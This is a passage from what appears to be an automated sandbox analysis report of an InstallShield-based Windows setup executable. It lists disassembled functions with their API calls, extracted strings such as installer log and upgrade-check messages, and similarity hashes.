                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3__memset_wcscpy
                                                                                                                                                                          • String ID: %s%sReason: %s$>>> Fatal %sReason: %s$function failed.$handle in invalid state.$more buffer space required to hold data.$no more items.$passed a bad SQL syntax.$passed an invalid handle.$passed an invalid parameter.$unknown error.
                                                                                                                                                                          • API String ID: 2196721711-2340172371
                                                                                                                                                                          • Opcode ID: d25d9e715f0536d24c1fe7b219b55f491049d5f0ef4e7a1936fa54e62313dcac
                                                                                                                                                                          • Instruction ID: 57c25f43754d667ffcf34d7ea5bfa1266e1883b32a9bdbde624818df8a69f17e
                                                                                                                                                                          • Opcode Fuzzy Hash: d25d9e715f0536d24c1fe7b219b55f491049d5f0ef4e7a1936fa54e62313dcac
                                                                                                                                                                          • Instruction Fuzzy Hash: 43313B31614214EAEB21AE74DD89FDA36A8BF40744F78816BB04CE7151DA7DCE40879D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042463F, Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 350COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00424649
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000,?,00000104), ref: 004246F4
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                          • CoCreateGuid.OLE32(?), ref: 00424710
                                                                                                                                                                            • Part of subcall function 0041F5B5: __EH_prolog3.LIBCMT ref: 0041F5BC
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,?,00000000,?,00000001), ref: 0042477C
                                                                                                                                                                            • Part of subcall function 0041F6E0: __EH_prolog3.LIBCMT ref: 0041F6E7
                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00424925
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?), ref: 00424A16
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$String$CreateH_prolog3H_prolog3_$DirectoryFree$AllocGuidPathPrivateProfileTemp
                                                                                                                                                                          • String ID: !$Could not extract isconfig.ini from current issetup.dll$Extracting resources for '%s' to '%s'$HsG$ISConfig.ini for current issetup.dll does not contain TempPathGuid.$IsConfig.ini$SetupDefaults$TempPathGuid$msiaction.cpp
                                                                                                                                                                          • API String ID: 475049944-3173567293
                                                                                                                                                                          • Opcode ID: c736df42fc1e8133a3aaf12240d668ac6e9cc9ee9e2a311ec99dcacba0d9e779
                                                                                                                                                                          • Instruction ID: 422b42d195b640220aa19e5a20030709430574c772c178844e04b8e6cdc35463
                                                                                                                                                                          • Opcode Fuzzy Hash: c736df42fc1e8133a3aaf12240d668ac6e9cc9ee9e2a311ec99dcacba0d9e779
                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF18F30901158EEDB21DB60CC99BDDBBB4AF15304F5040EEE049B7192DBB85B88DF56
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00424E4C, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 147COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00424E56
                                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000002), ref: 00424EA0
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0042506F
                                                                                                                                                                          Strings
                                                                                                                                                                          • {78705f0d-e8db-4b2d-8193-982bdda15ecd}, xrefs: 00424EFC
                                                                                                                                                                          • {1C370964-514B-321C-7237-2B4FD86D8568}, xrefs: 00424FEE
                                                                                                                                                                          • HsG, xrefs: 0042500E
                                                                                                                                                                          • Software\Microsoft\Active Setup\Installed Components\%s, xrefs: 0042502D
                                                                                                                                                                          • {F1B13231-13BE-1231-5401-486BA763DEB6}, xrefs: 00424F4A
                                                                                                                                                                          • HsG, xrefs: 00424EB9
                                                                                                                                                                          • {F279058C-50B2-4BE4-60C9-369CACF06821}, xrefs: 00424F06
                                                                                                                                                                          • {021122EA-49DC-4aeb-9D15-DCEAD9BAB1BC}, xrefs: 00424FE7
                                                                                                                                                                          • {E7E2C871-090A-C372-F9AE-C3C6A988D260}, xrefs: 00424F7C
                                                                                                                                                                          • {9B29D757-088E-E8C9-2535-AA319B92C00A}, xrefs: 00424EF2
                                                                                                                                                                          • {6741C120-01BA-87F9-8734-5FB9DA8A4445}, xrefs: 00424F18
                                                                                                                                                                          • {7E76A8D6-33D1-0032-16C3-4593092861D0}, xrefs: 00424FB3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ChangeClearH_prolog3_Type
                                                                                                                                                                          • String ID: HsG$HsG$Software\Microsoft\Active Setup\Installed Components\%s${021122EA-49DC-4aeb-9D15-DCEAD9BAB1BC}${1C370964-514B-321C-7237-2B4FD86D8568}${6741C120-01BA-87F9-8734-5FB9DA8A4445}${78705f0d-e8db-4b2d-8193-982bdda15ecd}${7E76A8D6-33D1-0032-16C3-4593092861D0}${9B29D757-088E-E8C9-2535-AA319B92C00A}${E7E2C871-090A-C372-F9AE-C3C6A988D260}${F1B13231-13BE-1231-5401-486BA763DEB6}${F279058C-50B2-4BE4-60C9-369CACF06821}
                                                                                                                                                                          • API String ID: 1792846764-3449593182
                                                                                                                                                                          • Opcode ID: e19c57af00a7d685a60a1ac6c43a8072efcd9905f2ec8131e09690753a3a007a
                                                                                                                                                                          • Instruction ID: e1f09da3d8c79b7a94f4d719e70322d1d5d46633c1e069c4a31a349c26b4b686
                                                                                                                                                                          • Opcode Fuzzy Hash: e19c57af00a7d685a60a1ac6c43a8072efcd9905f2ec8131e09690753a3a007a
                                                                                                                                                                          • Instruction Fuzzy Hash: F351B070904228EADB15DBA4DD95BEEB778FB54304F5040ABE105B31C1DBB85F88CBA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043D162, Relevance: 25.6, APIs: 17, Instructions: 113windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetObjectW.GDI32(00000018,?), ref: 0043D194
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0043D19E
                                                                                                                                                                          • GetClientRect.USER32 ref: 0043D1A5
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0043D1CC
                                                                                                                                                                          • GetDC.USER32(?), ref: 0043D1EF
                                                                                                                                                                          • GetObjectW.GDI32(00000018,?), ref: 0043D206
                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0043D20D
                                                                                                                                                                          • UnrealizeObject.GDI32(?), ref: 0043D22A
                                                                                                                                                                          • SelectPalette.GDI32(00000000,00000000), ref: 0043D23A
                                                                                                                                                                          • RealizePalette.GDI32(00000000), ref: 0043D243
                                                                                                                                                                          • UnrealizeObject.GDI32 ref: 0043D24B
                                                                                                                                                                          • SelectPalette.GDI32(?,00000000), ref: 0043D259
                                                                                                                                                                          • RealizePalette.GDI32(?), ref: 0043D25C
                                                                                                                                                                          • SelectObject.GDI32(00000000), ref: 0043D26A
                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0043D281
                                                                                                                                                                          • ReleaseDC.USER32 ref: 0043D28B
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0043D292
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$Palette$Select$RealizeUnrealizeWindow$ClientCompatibleCreateDeleteDesktopMoveRectRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 366568439-0
                                                                                                                                                                          • Opcode ID: 677b7529f672cd94073a5640aebef2d8f473a285588791bcb5e9a1b8363506d5
                                                                                                                                                                          • Instruction ID: b2ccb0e58f1a82030835cec0cd54cbeda00348c61cd9d38e7dc0f432015da3d9
                                                                                                                                                                          • Opcode Fuzzy Hash: 677b7529f672cd94073a5640aebef2d8f473a285588791bcb5e9a1b8363506d5
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C413771900A09AFDB10EFA5ED88D9FBFBAFB4D310F414025F609A2161CB749984CB68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004363C6, Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 431COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 004363D0
                                                                                                                                                                            • Part of subcall function 004357B3: __EH_prolog3_GS.LIBCMT ref: 004357BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_H_prolog3_catch_
                                                                                                                                                                          • String ID: ($2$HsG$HsG$HsG$HsG$InstalledProductName$PackageCode$Upgrade check: checking product code %s$Upgrade check: later product version already installed$Upgrade check: obtained package code %s from machine, current package code is %s$VersionString$session.cpp
                                                                                                                                                                          • API String ID: 2112800272-638240998
                                                                                                                                                                          • Opcode ID: 120769b701112ec8ab18dcc26686db22261c2e5ada71781d1a8c588cdbd3f153
                                                                                                                                                                          • Instruction ID: 0204d4eceb47be3209c3973f8a897ae08c3e46392e2024efe32576f74c84db10
                                                                                                                                                                          • Opcode Fuzzy Hash: 120769b701112ec8ab18dcc26686db22261c2e5ada71781d1a8c588cdbd3f153
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A128E70801248EEDB15DBA4C946BDDB7B4AF15308F1080EEE545BB192DBB85F88CF99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043780F, Relevance: 24.9, APIs: 5, Strings: 9, Instructions: 382COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00437819
                                                                                                                                                                            • Part of subcall function 004363C6: __EH_prolog3_catch_GS.LIBCMT ref: 004363D0
                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001,?,00000000,?,?,?,00000000), ref: 004378A2
                                                                                                                                                                          • _memset.LIBCMT ref: 00437929
                                                                                                                                                                          • __itow.LIBCMT ref: 00437942
                                                                                                                                                                            • Part of subcall function 00444D0D: _xtow@16.LIBCMT ref: 00444D2E
                                                                                                                                                                          • _wcscat.LIBCMT ref: 00437962
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0041D880: __EH_prolog3_GS.LIBCMT ref: 0041D88A
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00433F11: _memset.LIBCMT ref: 00433F6F
                                                                                                                                                                            • Part of subcall function 00433F11: _memset.LIBCMT ref: 00433F8A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3__memset$FreeString$H_prolog3H_prolog3_catch_LocaleValid__itow_wcscat_xtow@16
                                                                                                                                                                          • String ID: $/LangTransform$<MJ$Default language: %d, got code page %d$Language transforms in stream$ScriptDriven$Startup$Using language transforms from setup.exe location$session.cpp
                                                                                                                                                                          • API String ID: 559606162-2858859072
                                                                                                                                                                          • Opcode ID: 6f2b15a9107f50949129f1c71daf3bf9acfbb2ee8ae0d365c4e095d2c0f55bf1
                                                                                                                                                                          • Instruction ID: c09ab663e801afe899ada345f01b923719eec0f64f9772229470391baf9507df
                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2b15a9107f50949129f1c71daf3bf9acfbb2ee8ae0d365c4e095d2c0f55bf1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF16271900119EEDB24EB61CC85BEDB7B8BB04304F1481AEE189A71D1DF789B44DF99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042105E, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 232COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00421068
                                                                                                                                                                          • _memset.LIBCMT ref: 0042107F
                                                                                                                                                                          • _memset.LIBCMT ref: 0042109A
                                                                                                                                                                            • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 00440164
                                                                                                                                                                            • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 0044016C
                                                                                                                                                                            • Part of subcall function 00440126: _malloc.LIBCMT ref: 00440186
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 00440197
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 004401C2
                                                                                                                                                                            • Part of subcall function 00440126: wsprintfW.USER32 ref: 00440214
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 0044022C
                                                                                                                                                                            • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D1D
                                                                                                                                                                            • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D27
                                                                                                                                                                            • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440D9C
                                                                                                                                                                            • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440DC5
                                                                                                                                                                            • Part of subcall function 00436D0C: __EH_prolog3_GS.LIBCMT ref: 00436D13
                                                                                                                                                                          • GetVersionExW.KERNEL32 ref: 0042111D
                                                                                                                                                                          • _memset.LIBCMT ref: 0042119F
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004211B4
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000400,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004211DF
                                                                                                                                                                            • Part of subcall function 0042159C: _memset.LIBCMT ref: 004215F1
                                                                                                                                                                            • Part of subcall function 0042159C: __wsplitpath.LIBCMT ref: 00421601
                                                                                                                                                                            • Part of subcall function 0042159C: lstrcatW.KERNEL32(?,00477E70), ref: 00421615
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 0043619F: __EH_prolog3_GS.LIBCMT ref: 004361A9
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$ErrorLastlstrcpy$H_prolog3_$FreeString_swscanf$DirectoryPathTempVersionWindows__wsplitpath_malloclstrcatwsprintf
                                                                                                                                                                          • String ID: HsG$Msi.DLL$Startup$SupportOS$SupportOSMsi12$SupportOSMsi30$SuppressWrongOS
                                                                                                                                                                          • API String ID: 3706879116-3037316375
                                                                                                                                                                          • Opcode ID: 416bd0cf505e52742f9f74ea2fa7f5d11c1fe551ba23b47897ad563edc265b8b
                                                                                                                                                                          • Instruction ID: caa492eded2fdaccb401baaebedf74d337fa1deb203e1fa19a1ead8822504caa
                                                                                                                                                                          • Opcode Fuzzy Hash: 416bd0cf505e52742f9f74ea2fa7f5d11c1fe551ba23b47897ad563edc265b8b
                                                                                                                                                                          • Instruction Fuzzy Hash: E581E770A00219AAEB24DB61DC85BEE73B99F15308F5045BFE50AE3191EF389A44CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00431DBA, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00431DC1
                                                                                                                                                                          • _wcsstr.LIBCMT ref: 00431E50
                                                                                                                                                                          • CharNextW.USER32(?,?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431E61
                                                                                                                                                                          • CharNextW.USER32(00000000,?,?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431E66
                                                                                                                                                                          • CharNextW.USER32(00000000,?,?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431E6B
                                                                                                                                                                          • CharNextW.USER32(00000000,?,?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431E70
                                                                                                                                                                          • CharNextW.USER32(00000000,}},?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431F18
                                                                                                                                                                          • CharNextW.USER32(?,00000000,?), ref: 00431F9D
                                                                                                                                                                          • CharNextW.USER32(?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431FB1
                                                                                                                                                                          • CoTaskMemFree.OLE32(?,0000005C,00432177,?,00000000), ref: 00431FF9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext$FreeH_prolog3_Task_wcsstr
                                                                                                                                                                          • String ID: }}$HKCR$HKCU{Software{Classes
                                                                                                                                                                          • API String ID: 2086807494-1142484189
                                                                                                                                                                          • Opcode ID: aeb093225fad7f288d953d11fdf1aac4eec3ddf20d046431c247e71481c2dfe6
                                                                                                                                                                          • Instruction ID: 3890b2c11137fcd4a6d5b455fef8a38a5d18732a6f98f8215163c9c2b6e0171c
                                                                                                                                                                          • Opcode Fuzzy Hash: aeb093225fad7f288d953d11fdf1aac4eec3ddf20d046431c247e71481c2dfe6
                                                                                                                                                                          • Instruction Fuzzy Hash: A871A3709043469AEF14DBF5C985AAEB7B4AF1C304F24542BE805EB3A5EB79CC45CB18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00439C6D, Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 383COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00439C77
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
